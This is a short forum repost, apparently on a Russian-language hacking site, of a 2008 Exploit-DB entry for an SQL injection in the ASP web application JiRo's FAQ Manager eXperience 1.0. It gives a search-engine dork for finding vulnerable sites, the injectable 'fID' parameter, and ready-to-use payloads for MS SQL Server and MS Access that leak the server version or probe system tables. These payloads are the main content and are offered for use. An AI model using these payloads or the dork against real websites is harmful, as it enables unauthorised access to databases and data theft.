Exploit JiRo's FAQ Manager eXperience 1.0 - 'fID' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5753
Проверка EDB
  1. Пройдено
Автор
ZIGMA
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2008-2691
Дата публикации
2008-06-08
Код:
[+] Script Name     : JiRo´s FAQ Manager eXperience
[+] Version         : v 1.0
[+] Price           : _ Single Website License 34.95 $
                      _ 2 Websites License 62.95 $
                      _ 5 Websites License 139.95 $
[+] Author          : Underz0ne Crew
[+] Home            : http://www.underz0ne.net
[+] Script In short : ('JiRos FAQ Management System is an essential 
element for any webmaster, providing your customers with answers to 
specific questions on-line 24 hours a day, 7 days a week. Build a 
complete knowledge base, adding articles and creating your own topic 
based FAQ system using our feature packed administration facility ')
[+] Dork            : inurl:"read.asp?fID="

--//--> Exploit :

read.asp?fID={SQL}

__--> MS SQL Server : convert(int,(select+@@version));

__--> MS Access     : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00

--//--> 

# milw0rm.com [2008-06-08]
 
Источник
www.exploit-db.com

Похожие темы